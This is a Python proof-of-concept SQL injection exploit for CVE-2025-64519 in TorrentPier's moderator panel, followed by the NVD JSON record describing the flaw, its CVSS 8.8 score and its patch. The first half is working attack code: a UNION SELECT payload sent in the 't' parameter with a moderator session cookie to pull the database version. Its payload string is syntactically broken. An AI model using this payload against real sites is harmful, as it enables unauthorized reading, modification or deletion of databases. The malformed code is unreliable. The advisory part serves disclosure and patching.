CVE-2025-64519

# CVE-2025-64519 SQL Injection PoC # Target: TorrentPier modcp.php # Authentication: Requires moderator privileges # Payload: Malicious topic_id parameter injection import requests import sys TARGET_URL = "http://target-site.com/modcp.php" # SQL Injection payload to extract database version # The 't' parameter is vulnerable to SQL injection PAYLOAD = "1' UNION SELECT NULL,version(),NULL,NULL,NULL--- def exploit(target_url, session_cookie): """Execute SQL injection attack""" cookies = {'phpbb2_torrentpier_data': session_cookie} # Basic exploitation payload params = {'t': PAYLOAD} try: response = requests.get(target_url, params=params, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully") print("[*] Check response for database information") # Extract and display potential sensitive data if '5.' in response.text or '8.' in response.text: print("[!] Database version detected in response") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>") sys.exit(1) exploit(sys.argv[1], sys.argv[2]) # Note: Replace TARGET_URL and obtain valid moderator session cookie # This PoC demonstrates the vulnerability principle only

{"cve": {"id": "CVE-2025-64519", "sourceIdentifier": "[email protected]", "published": "2025-11-10T23:15:41.833", "lastModified": "2025-12-31T17:55:04.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TorrentPier is an open source BitTorrent Public/Private tracker engine, written in php. In versions up to and including 2.8.8, an authenticated SQL injection vulnerability exists in the moderator control panel (`modcp.php`). Users with moderator permissions can exploit this vulnerability by supplying a malicious `topic_id` (`t`) parameter. This allows an authenticated moderator to execute arbitrary SQL queries, leading to the potential disclosure, modification, or deletion of any data in the database. Although it requires moderator privileges, it is still severe. A malicious or compromised moderator account can leverage this vulnerability to read, modify, or delete data. A patch is available at commit 6a0f6499d89fa5d6e2afa8ee53802a1ad11ece80."}, {"lang": "es", "value": "TorrentPier es un motor de tracker BitTorrent Público/Privado de código abierto, escrito en PHP. En versiones hasta la 2.8.8 inclusive, existe una vulnerabilidad de inyección SQL autenticada en el panel de control del moderador ('modcp.php'). Los usuarios con permisos de moderador pueden explotar esta vulnerabilidad suministrando un parámetro 'topic_id' ('t') malicioso. Esto permite a un moderador autenticado ejecutar consultas SQL arbitrarias, lo que lleva a la posible divulgación, modificación o eliminación de cualquier dato en la base de datos. Aunque requiere privilegios de moderador, sigue siendo grave. Una cuenta de moderador maliciosa o comprometida puede aprovechar esta vulnerabilidad para leer, modificar o eliminar datos. Un parche está disponible en el commit 6a0f6499d89fa5d6e2afa8ee53802a1ad11ece80."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torrentpier:torrentpier:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.8.8", "matchCriteriaId": "F57C690A-DAD4-4ED5-A231-CAD6D3F9813C"}]}]}], "references": [{"url": "https://github.com/torrentpier/torrentpier/commit/6a0f6499d89fa5d6e2afa8ee53802a1ad11ece80", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/torrentpier/torrentpier/security/advisories/GHSA-4rwr-8c3m-55f6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/torrentpier/torrentpier/security/advisories/GHSA-4rwr-8c3m-55f6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}